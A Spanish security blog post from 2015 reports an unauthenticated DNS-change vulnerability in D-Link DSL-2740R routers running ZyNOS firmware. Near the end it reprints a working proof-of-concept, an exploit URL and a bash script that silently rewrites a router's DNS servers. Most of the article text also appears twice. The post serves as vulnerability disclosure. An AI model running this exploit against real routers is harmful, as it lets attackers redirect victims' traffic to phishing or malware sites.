Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
▼
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
▼
febrero
(Total:
19
)
- El FBI ofrece 3 millones de dólares de recompensa ...
- El cibercriminal más buscado por el FBI es arresta...
- El popular sitio de vídeos porno RedTube infectado...
- Disponible oclHashcat v1.33, ahora también crackea...
- Pwn2Own 2015: Gana 75.000$ encontrando un Bug en G...
- De Windows XP a Windows 10 vulnerables cambiando u...
- Facebook lanza ThreatExchange, una plataforma que ...
- Google Project Zero revela 0day en Adobe Reader pa...
- Facebook soluciona grave vulnerabilidad que permit...
- Tutorial básico funcionamiento y primeros pasos Wi...
- Laboratorio Virtualizado de Seguridad en Kali Linux
- Disponible Kali Linux – versión 1.1.0
- Introducción y Herramientas de Ingeniería Inversa
- Introducción al Análisis forense de Malware
- Desproteger y desbloquear un archivo PDF
- Estudio de Akamai sobre un ataque DDoS de Lizard S...
- DNS Hijack en router ADSL de D-Link
- Tercera vulnerabilidad 0-day crítica de Adobe Flas...
- Lanzamiento sopresa de Raspberry Pi 2 por 35 dólares
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
395
)
privacidad
(
363
)
google
(
353
)
ransomware
(
338
)
vulnerabilidad
(
301
)
Malware
(
263
)
Windows
(
243
)
android
(
242
)
cve
(
235
)
tutorial
(
235
)
manual
(
220
)
software
(
201
)
hardware
(
193
)
linux
(
124
)
twitter
(
115
)
ddos
(
94
)
WhatsApp
(
90
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
67
)
app
(
65
)
Networking
(
56
)
nvidia
(
52
)
ssd
(
51
)
youtube
(
50
)
adobe
(
43
)
firmware
(
42
)
office
(
41
)
hack
(
40
)
firefox
(
35
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
MAC
(
25
)
apache
(
25
)
programación
(
25
)
exploit
(
23
)
javascript
(
22
)
multimedia
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
En el panorama en constante evolución de la seguridad de redes, OpnSense se ha convertido en una formidable solución de firewall. Nacido de...
-
Pese a que Gemini ofrece multitudes de opciones, recientemente, se ha dado a conocer una situación fuera de lo común. Hace unos días, un es...
DNS Hijack en router ADSL de D-Link
lunes, 2 de febrero de 2015
|
Publicado por
el-brujo
|
Editar entrada
El popular router doméstico modelo DSL2740R inalámbrico de D-Link es vulnerable a un secuestro de nombres de dominio (DNS) que no requiere autenticación para acceder a su interfaz administrativa. La vulnerabilidad puede ser explotada remotamente. El problema también podría afectar a otros dispositivos, ya que se encuentra en un firmware popular usado por los diferentes fabricantes.
Según Todor Donev de la empresa de seguridad Ethical Hacker búlgaro, una serie de otros routers D-Link se ven afectados por este error también, particularmente la DSL-320B. PCWorld informa que la vulnerabilidad existe en una pieza de un gran despliegue de firmware del router llamado ZyNOS, que es desarrollado por ZuXEL Communications Corporation. -
La vulnerabilidad está en realidad en ZyNOS, un firmware del router desarrollado por ZyXEL Comunicaciones que se utiliza en productos de múltiples fabricantes de equipos de red, incluyendo D-Link, TP-Link Technologies y ZTE
Si la interfaz de administración del router está expuesta a Internet el riesgo de explotación es mayor, a veces se configura de esta manera para la administración remota.
Pero incluso si es sólo accesible desde dentro de la red de área local, los hackers pueden seguir utilizando cross-site request forgery (CSRF) para llegar a la interfaz de un router. Ataques CSRF secuestran navegadores de los usuarios para llevar a cabo acciones no autorizadas cuando visitan sitios comprometidos o hagan click en enlaces maliciosos.
El modelo ADSL DSL-2740R en cuestión ha sido descontinuado, según el sitio web de D-Link.
En marzo de 2014, la organización de investigación de seguridad de Internet Team Cymru descubrió una campaña de ataque global que comprometía más de 300.000 routers domésticos cambiando su configuración de DNS. Una vulnerabilidad diferente ZyNOS fue explotado en ese ataque y una de las técnicas utilizadas probablemente fué CSRF.
Recordemos también que la gran botnet formada entre 250.000 y 500.000 routers domésticos fue la utilizada por el grupo Lizard Squad para dejar sin servicio a los propietarios de una Play Station 4 o una Xbox haciendo un ataque DDoS a la red PSN (PlayStation Network) y Xbobx Live el día de navidad.
Según Todor Donev de la empresa de seguridad Ethical Hacker búlgaro, una serie de otros routers D-Link se ven afectados por este error también, particularmente la DSL-320B. PCWorld informa que la vulnerabilidad existe en una pieza de un gran despliegue de firmware del router llamado ZyNOS, que es desarrollado por ZuXEL Communications Corporation. -
La vulnerabilidad está en realidad en ZyNOS, un firmware del router desarrollado por ZyXEL Comunicaciones que se utiliza en productos de múltiples fabricantes de equipos de red, incluyendo D-Link, TP-Link Technologies y ZTE
Si la interfaz de administración del router está expuesta a Internet el riesgo de explotación es mayor, a veces se configura de esta manera para la administración remota.
Pero incluso si es sólo accesible desde dentro de la red de área local, los hackers pueden seguir utilizando cross-site request forgery (CSRF) para llegar a la interfaz de un router. Ataques CSRF secuestran navegadores de los usuarios para llevar a cabo acciones no autorizadas cuando visitan sitios comprometidos o hagan click en enlaces maliciosos.
El modelo ADSL DSL-2740R en cuestión ha sido descontinuado, según el sitio web de D-Link.
En marzo de 2014, la organización de investigación de seguridad de Internet Team Cymru descubrió una campaña de ataque global que comprometía más de 300.000 routers domésticos cambiando su configuración de DNS. Una vulnerabilidad diferente ZyNOS fue explotado en ese ataque y una de las técnicas utilizadas probablemente fué CSRF.
Recordemos también que la gran botnet formada entre 250.000 y 500.000 routers domésticos fue la utilizada por el grupo Lizard Squad para dejar sin servicio a los propietarios de una Play Station 4 o una Xbox haciendo un ataque DDoS a la red PSN (PlayStation Network) y Xbobx Live el día de navidad.
http://x.x.x.x/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=a.a.a.a
PoC - Prueba de Concepto - proof-of-concept
#!/bin/bash # # D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev
if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0# http://www.ethical-hacker.org/ # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES MAY AFFECTED. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # " echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev " echo " http://www.ethical-hacker.org/" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.